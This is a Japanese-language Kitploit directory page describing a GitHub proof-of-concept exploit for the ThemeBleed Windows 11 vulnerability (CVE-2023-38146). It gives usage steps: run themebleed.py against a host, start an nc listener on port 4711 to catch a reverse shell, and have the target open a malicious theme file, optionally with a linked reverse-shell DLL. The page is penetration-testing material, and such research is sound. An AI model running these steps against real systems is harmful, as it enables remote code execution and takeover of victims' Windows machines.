Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38146 — impacket を使用して python で書かれた、ThemeBleed Windows 11 CVE-2023-38146 の PoC。 https://jnns.de/posts/cve-2023-38146-poc/ | Kitploit
ツール/GitHubGitHub/jnnshschl/cve-2023-38146
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubjnnshschl/cve-2023-38146

CVE-2023-38146

impacket を使用して python で書かれた、ThemeBleed Windows 11 CVE-2023-38146 の PoC。 https://jnns.de/posts/cve-2023-38146-poc/

リポジトリを見る
27412年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ThemeBleed CVE-2023-38146 エクスプロイトの PoC (Windows 11 テーマ)

https://github.com/gabe-k/themebleed に大きく影響を受けています。元のツールは Windows でのみ動作するため、この PoC を書くことにしました。

impacket の smbserver.py の改変コードを使用しています (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)

参考情報: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs

ブログ記事: https://jnns.de/posts/cve-2023-38146-poc/

使い方:

必要なパッケージをインストールして、アプリケーションを実行します:

root@kitploit:~
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711

脆弱なマシン上で "evil_theme.theme" または "evil_theme.themepack" を使用してください。

成功!

カスタム DLL ファイル:

エクスポートされた関数 "VerifyThemeVersion" を含む DLL を "./td/" フォルダ内に "Aero.msstyles_vrf_evil.dll" という名前で配置してください。Google で検索すればサンプル DLL が見つかるはずです。または私のサンプル https://github.com/Jnnshschl/ThemeBleedReverseShellDLL を使用してください。

root@kitploit:~
pip3 install -r requirements.txt python3 themebleed.py -r HOST --no-dll # start nc listener in other shell rlwrap -cAr nc -lvnp 4711
ツールをダウンロード